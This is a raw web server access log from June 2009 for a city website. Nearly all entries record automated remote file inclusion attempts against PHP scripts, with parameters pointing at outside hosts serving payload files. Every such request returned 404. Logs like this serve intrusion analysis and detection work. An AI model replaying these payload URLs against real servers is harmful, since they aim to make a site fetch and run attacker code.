125.251.147.130 - - [30/Jun/2009:20:20:37 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:20:37 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:20:50 -0700] "GET /logs/access.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:20:50 -0700] "GET /logs/access_081001.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:21:03 -0700] "GET /logs/access_081001.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:20:21:03 -0700] "GET /logs/access.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:21:04 -0700] "GET /logs/access_081001.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.16.182.130 - - [30/Jun/2009:20:24:48 -0700] "GET /lang.php?ln=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [30/Jun/2009:20:24:48 -0700] "GET /logs/access_080531.log%20%20/lang.php?ln=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [30/Jun/2009:20:24:48 -0700] "GET /logs/lang.php?ln=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:25:32 -0700] "GET /logs/access_081001.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:26:30 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:26:30 -0700] "GET //vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:26:30 -0700] "GET /logs///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.230.22.39 - - [30/Jun/2009:20:26:35 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "cityofarkadelphia.com"
87.230.22.39 - - [30/Jun/2009:20:26:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "cityofarkadelphia.com"
87.230.22.39 - - [30/Jun/2009:20:26:35 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:28:19 -0700] "GET //vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:28:20 -0700] "GET /logs///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:28:20 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:32:27 -0700] "GET /logs/access_081001.log%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:33:56 -0700] "GET /logs/access.log%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:34:19 -0700] "GET /logs/access_080330.log///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [30/Jun/2009:20:35:27 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [30/Jun/2009:20:35:27 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [30/Jun/2009:20:35:27 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.189.39.159 - - [30/Jun/2009:20:35:35 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.189.39.159 - - [30/Jun/2009:20:35:35 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.189.39.159 - - [30/Jun/2009:20:35:35 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:34 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:34 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:34 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:20:36:39 -0700] "GET /logs/access.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:20:36:39 -0700] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:20:36:39 -0700] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:41 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:42 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:46 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:46 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:46 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:57 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:57 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:36:57 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:00 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:00 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:00 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:20:37:07 -0700] "GET /logs/access.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:18 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:18 -0700] "GET /logs/access_080330.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:18 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:21 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:21 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:24 -0700] "GET /logs/access_080330.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:20:37:25 -0700] "GET /logs/access_080330.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:28 -0700] "GET /logs/access_080330.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:28 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:37:28 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.30.78.227 - - [30/Jun/2009:20:38:37 -0700] "GET /Downloads/?N=D HTTP/1.0" 200 655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:20:38:41 -0700] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:20:38:41 -0700] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:20:38:41 -0700] "GET /logs/access.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:39:01 -0700] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:39:01 -0700] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:39:01 -0700] "GET /logs/access.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:20:39:21 -0700] "GET /logs/access.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [30/Jun/2009:20:39:24 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [30/Jun/2009:20:39:37 -0700] "GET /logs/access_080601.log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [30/Jun/2009:20:39:50 -0700] "GET /logs/access.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [30/Jun/2009:20:39:50 -0700] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.138.156.3 - - [30/Jun/2009:20:39:50 -0700] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:20:40:40 -0700] "GET /logs/access_080330.log%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:42:28 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:42:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:42:28 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:42:54 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:42:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:42:55 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:20:44:14 -0700] "GET /logs/access_080330.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:47:09 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:47:09 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:47:09 -0700] "GET /logs/access_090401.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:47:10 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:47:10 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:20:47:10 -0700] "GET /logs/access_090401.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:48:14 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:48:14 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:48:14 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:48:37 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:48:37 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:20:48:37 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:48:50 -0700] "GET /logs/access_080330.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:20:50:55 -0700] "GET /logs/access_080531.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:53:25 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.146.231.194 - - [30/Jun/2009:20:53:28 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.145.1 - - [30/Jun/2009:20:56:43 -0700] "GET /logs/access_080330.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:21:01:07 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:21:01:07 -0700] "GET /logs/access_080330.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:21:01:08 -0700] "GET /logs/access_080531.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:21:02:14 -0700] "GET /logs/access_080531.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.149.102.130 - - [30/Jun/2009:21:02:14 -0700] "GET /logs/access_080330.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.30.78.227 - - [30/Jun/2009:21:05:24 -0700] "GET /logs/?S=D HTTP/1.0" 200 4211 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:05 -0700] "GET /logs/access_080330.log//skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:05 -0700] "GET /logs/access_080330.log//skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:05 -0700] "GET /skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:05 -0700] "GET /skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:07 -0700] "GET /skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:10 -0700] "GET /logs/access_080330.log//skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:15 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:15 -0700] "GET /skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:23 -0700] "GET /skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [30/Jun/2009:21:11:23 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/error.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:12:08 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:12:08 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:12:17 -0700] "GET /logs/access_080330.log//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:21:12:17 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
